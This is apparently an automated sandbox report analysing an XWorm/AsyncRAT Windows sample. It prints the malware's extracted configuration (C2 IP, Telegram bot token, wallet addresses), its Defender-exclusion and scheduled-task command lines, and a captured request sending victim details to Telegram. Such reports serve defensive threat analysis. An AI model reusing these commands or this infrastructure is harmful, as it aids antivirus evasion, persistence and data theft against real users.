Edit tour

Windows Analysis Report
Or3dzp4vB1.exe

Overview

General Information

Sample name:	Or3dzp4vB1.exe renamed because original name is a hash value
Original sample name:	a02b12e6a3848148cf2ff394d0593c0532c57603f1a8fb74040e668284e33e70.exe
Analysis ID:	1518191
MD5:	a1880883ff14f58135fc2db22f46a8ac
SHA1:	cae4492fc961ef9cd08bcdbfd5b9b781f6458471
SHA256:	a02b12e6a3848148cf2ff394d0593c0532c57603f1a8fb74040e668284e33e70
Tags:	185-196-10-235AsyncRATexeuser-JAMESWT_MHT
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Telegram RAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Or3dzp4vB1.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\Or3dzp4vB1.exe" MD5: A1880883FF14F58135FC2DB22F46A8AC)

powershell.exe (PID: 7388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Or3dzp4vB1.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\0720XW' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '0720XW' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8016 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

0720XW (PID: 336 cmdline: C:\Users\user\AppData\Roaming\0720XW MD5: A1880883FF14F58135FC2DB22F46A8AC)

OpenWith.exe (PID: 6580 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)

svchost.exe (PID: 6480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

OpenWith.exe (PID: 6516 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)

0720XW (PID: 1008 cmdline: C:\Users\user\AppData\Roaming\0720XW MD5: A1880883FF14F58135FC2DB22F46A8AC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["185.196.10.235"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "windefender.exe", "Telegram URL": "https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=6857243638"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Or3dzp4vB1.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Or3dzp4vB1.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Or3dzp4vB1.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x11f0f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11fac:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x120c1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10170:$cnc4: POST / HTTP/1.1

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_XWorm_1	Yara detected XWorm	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\0720XW	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Roaming\0720XW	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\0720XW	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x11f0f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11fac:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x120c1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10170:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1230942361.0000000000A82000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.1230942361.0000000000A82000.00000002.00000001.01000000.00000003.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x11d0f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11dac:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11ec1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xff70:$cnc4: POST / HTTP/1.1
Process Memory Space: Or3dzp4vB1.exe PID: 7300	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: Or3dzp4vB1.exe PID: 7300	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.Or3dzp4vB1.exe.a80000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.Or3dzp4vB1.exe.a80000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.Or3dzp4vB1.exe.a80000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x11f0f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11fac:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x120c1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10170:$cnc4: POST / HTTP/1.1

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Or3dzp4vB1.exe", ParentImage: C:\Users\user\Desktop\Or3dzp4vB1.exe, ParentProcessId: 7300, ParentProcessName: Or3dzp4vB1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe', ProcessId: 7388, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Or3dzp4vB1.exe", ParentImage: C:\Users\user\Desktop\Or3dzp4vB1.exe, ParentProcessId: 7300, ParentProcessName: Or3dzp4vB1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe', ProcessId: 7388, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\0720XW, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Or3dzp4vB1.exe, ProcessId: 7300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0720XW

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\0720XW, CommandLine: C:\Users\user\AppData\Roaming\0720XW, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\0720XW, NewProcessName: C:\Users\user\AppData\Roaming\0720XW, OriginalFileName: C:\Users\user\AppData\Roaming\0720XW, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Users\user\AppData\Roaming\0720XW, ProcessId: 336, ProcessName: 0720XW

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Or3dzp4vB1.exe, ProcessId: 7300, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0720XW.lnk

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Or3dzp4vB1.exe", ParentImage: C:\Users\user\Desktop\Or3dzp4vB1.exe, ParentProcessId: 7300, ParentProcessName: Or3dzp4vB1.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW", ProcessId: 8016, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Or3dzp4vB1.exe", ParentImage: C:\Users\user\Desktop\Or3dzp4vB1.exe, ParentProcessId: 7300, ParentProcessName: Or3dzp4vB1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe', ProcessId: 7388, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6480, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm Checkin via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T14:06:00.051469+0200	2853685	1	A Network Trojan was detected	192.168.2.7	49705	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Or3dzp4vB1.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\0720XW

Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: Or3dzp4vB1.exe	Malware Configuration Extractor: Xworm {"C2 url": ["185.196.10.235"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "windefender.exe", "Telegram URL": "https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=6857243638"}
Source: Or3dzp4vB1.exe.7300.0.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\0720XW

ReversingLabs: Detection: 84%

Multi AV Scanner detection for submitted file

Source: Or3dzp4vB1.exe

ReversingLabs: Detection: 84%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\0720XW

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Or3dzp4vB1.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: Or3dzp4vB1.exe	String decryptor: 185.196.10.235
Source: Or3dzp4vB1.exe	String decryptor: 7000
Source: Or3dzp4vB1.exe	String decryptor: <123456789>
Source: Or3dzp4vB1.exe	String decryptor: <Xwormmm>
Source: Or3dzp4vB1.exe	String decryptor: 0720
Source: Or3dzp4vB1.exe	String decryptor: windefender.exe
Source: Or3dzp4vB1.exe	String decryptor: %AppData%
Source: Or3dzp4vB1.exe	String decryptor: 0720XW
Source: Or3dzp4vB1.exe	String decryptor: bc1q33ptlu39p0m6agnvyqus3c59fc84ecayq3xn6p
Source: Or3dzp4vB1.exe	String decryptor: 0x797e0D2F78aD544E66cC5959a3f9c17C30e68FeD
Source: Or3dzp4vB1.exe	String decryptor: TRC20_Address
Source: Or3dzp4vB1.exe	String decryptor: 7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs
Source: Or3dzp4vB1.exe	String decryptor: 6857243638

Source: Or3dzp4vB1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49705 version: TLS 1.2

Source: Or3dzp4vB1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49705 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.196.10.235

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: Or3dzp4vB1.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Or3dzp4vB1.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\0720XW, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.7:49706 -> 185.196.10.235:7000

Source: global traffic

HTTP traffic detected: GET /bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=6857243638&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A14ADFDFE8FE6B38195AF%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209YUNKW3%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%200720 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: SIMPLECARRIERCH SIMPLECARRIERCH

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.18.0Date: Wed, 25 Sep 2024 12:05:59 GMTContent-Type: application/jsonContent-Length: 84Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: powershell.exe, 0000000F.00000002.1569980075.00000224B5803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m(l
Source: powershell.exe, 0000000B.00000002.1389137672.000001E8B5A0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000B.00000002.1389137672.000001E8B5A0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic?8
Source: powershell.exe, 0000000B.00000002.1389137672.000001E8B5A0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micM;
Source: powershell.exe, 0000000B.00000002.1389343961.000001E8B5A1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: svchost.exe, 0000001A.00000002.2483028491.000001C437CCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.26.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.1281766413.0000017A90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1371294998.000001E8AD496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1545020931.00000224AD0B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1266561753.0000017A80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1318264431.000001E89D649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1446620025.000002249D26A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Or3dzp4vB1.exe, 00000000.00000002.2485100318.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1266561753.0000017A80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1318264431.000001E89D421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1446620025.000002249D041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1608470648.000001661DF91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1266561753.0000017A80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1318264431.000001E89D649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1446620025.000002249D26A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000011.00000002.1765571811.0000016636470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 0000000B.00000002.1386984770.000001E8B58A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1571333595.00000224B5857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000011.00000002.1765571811.0000016636470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co3
Source: powershell.exe, 00000002.00000002.1289901130.0000017AF7750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://.VisualC
Source: powershell.exe, 00000002.00000002.1266561753.0000017A80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1318264431.000001E89D421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1446620025.000002249D041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1608470648.000001661DF91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: Or3dzp4vB1.exe, 00000000.00000002.2485100318.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Or3dzp4vB1.exe, 0720XW.0.dr	String found in binary or memory: https://api.telegram.org/bot
Source: Or3dzp4vB1.exe, 00000000.00000002.2485100318.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=68572
Source: powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: edb.log.26.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000001A.00000003.1925125933.000001C43D230000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
